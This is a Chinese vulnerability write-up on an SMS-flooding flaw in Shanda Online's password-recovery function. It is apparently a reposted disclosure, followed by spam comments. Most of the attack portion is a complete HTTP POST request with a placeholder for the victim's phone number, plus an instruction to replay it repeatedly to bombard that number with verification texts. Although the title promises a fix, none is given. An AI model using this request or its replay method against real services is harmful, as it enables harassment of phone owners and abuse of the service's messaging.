盛大网络短信ddos攻击漏洞及修复

/ 7评 / 0

简要描述:

盛大在线存在短信ddos攻击漏洞

详细说明:

盛大在线忘记密码处会向手机发送验证码,URL:

http://pwd.sdo.com/ptinfo/safecen

ter/getpwd/ChgPwdStepOldPwd.aspx?showbindmobile=1

手机号码可任意控制,并且没有进行数量控制,可进行短信DDOS攻击

 

漏洞证明:

POST /ptinfo/safecenter/Controls/IPwd.aspx HTTP/1.1

Host: pwd.sdo.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv
:6.0.1) Gecko/20100101 Firefox/6.0.1

Accept: */*

Accept-Language: zh-cn,zh;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Content-Type: application/x-www-form-ur
lencoded; c
harset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://pwd.sdo.com/ptinfo/safece
nter/getpwd/ChgPwdStepOldPwd.aspx?showbin
dmobile=1

Content-Length: 444 www.2cto.com

Cookie: ASP.NET_SessionId=rfuowv55tuqwmg
ifvidao255; b_t_s=t115065872973xs; sdo_b
eacon_id=58.215.45.150.1315065873297.3; 
CaptchaSeq=kgWVVswyQC6C55eS

Pragma: no-cache

Cache-Control: no-cache

at=GetPwdMobileSendCode&source=S&pt=&ekey=&
ekey1=&ekey2=&ekey3=&ekey4=&ecard1=&ecard2
=&ecard3=&phone=[替换为目标手机号]&code=&img
code=&email=&mobile=&mobilecode=&emailcode=
&regname=&regidcard=&regemail=&regmobile=&r
egtel=&regbirthday=&regquestion1=&reganswer
1=&regquestion2=&reganswer2=&adultname=&adu
ltidcard=&orgpwd=&signarea=&firstgame=&sign
time=&stolentime=&hispwd=&oldpwd=&newpwd=&ne
wpwd2=&days=&selectunbind=&uploadpic=&custom
pwd=&a=&randomcode=

不断回放以上数据包,可进行DDOS攻击

作者mog

 

《 “盛大网络短信ddos攻击漏洞及修复” 》 有 7 条评论

  1. How To Calculate Bmi

    Bmi Calculator For Women

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注